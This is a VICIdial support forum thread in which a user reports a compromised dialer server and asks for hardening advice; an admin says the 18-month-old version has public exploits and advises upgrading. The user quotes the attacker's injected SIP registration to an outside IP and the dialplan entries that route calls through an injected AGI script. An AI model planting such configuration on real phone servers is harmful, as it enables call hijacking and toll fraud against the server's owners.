VICIDIAL HACK some file injected

All installation and configuration problems and questions

Moderators: gerski, enjay, williamconley, Op3r, Staydog, gardo, mflorell, MJCoate, mcargile, Kumba, Michael_N

VICIDIAL HACK some file injected

Postby Farzvoip » Thu Mar 09, 2023 3:32 pm

hello,



Recently I have notice some kind of files injected in my vicibox server firstly i have notice my all carrier have been disappears from root when I type

( asterisk -rx"sip show registry") the outcome is

(104.238.131.72:45931 N Endpoint 120 Registered Thu, 09 Mar 2023 15:17:27)

and all my carrier have been disappeared apart from above one.

so I try to fine what is the matter I went to (/etc/asterisk/sip.conf) and Shaw there is a unknow carrier registered like this


register => Endpoint:99ruPP41Q97qsyGT@104.238.131.72:45931

[Endpoint]
type = friend
context = default
host = 104.238.131.72
port = 45931
qualify = no

when I have delete this one and reload the sip the all carriers appeared


I try to find more and found some extra unknow files have been injected in (/etc/asterisk/extensions.conf)

[
; VICIDIAL query
exten => 8397,1,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,QUERY)
exten => 8397,n,Hangup()

; VICIDIAL direct
exten => _8398*.,1,Set(USER=${CUT(EXTEN,*,2)})
exten => _8398*.,n,Set(DIALCODE=${CUT(EXTEN,*,3)})
exten => _8398*.,n,Set(CALLERID=${CUT(EXTEN,*,4)})
exten => _8398*.,n,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,RUN_DIRECT-----${USER}-----${DIALCODE}-----${CALLERID})
exten => _8398*.,n,Hangup()

; VICIDIAL campaign
exten => _8399!,1,Set(CAMPAIGN=${CUT(EXTEN,*,2)})
exten => _8399!,n,Set(DIALCODE=${CUT(EXTEN,*,3)})
exten => _8399!,n,Set(CALLERID=${CUT(EXTEN,*,4)})
exten => _8399!,n,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,RUN-----${CAMPAIGN}-----${DIALCODE}-----${CALLERID})
exten => _8399!,n,Hangup()

]


I have deleted this one and also from directory

but the thing is that how the have entered into my server and how they have injected files

and after removing again same injected file and carrier put by hackers. how to stop them to get into my server

Action done
root password changed


please do let me know any suggestion and how to increase securities



Systems cloud server
VERSION: 2.14-830a
BUILD: 210920-2159
© 2021 ViciDial Group
Asteris version 11.25.1-vici, tried in vicibox 7.0.4,
server Intel(R) Xeon(R) CPU E3-1230 v3 @ 3.30GHz
Farzvoip
 
Posts: 19
Joined: Wed Dec 22, 2021 5:59 pm

Re: VICIDIAL HACK some file injected

Postby mflorell » Thu Mar 09, 2023 5:55 pm

The version of VICIdial you are using is 18 months old, there have been several public exploits published that are present in your system. I would strongly recommend upgrading to the latest svn/trunk revision of VICIdial.
mflorell
Site Admin
 
Posts: 18335
Joined: Wed Jun 07, 2006 2:45 pm
Location: Florida


Return to Support

Who is online

Users browsing this forum: Google [Bot] and 90 guests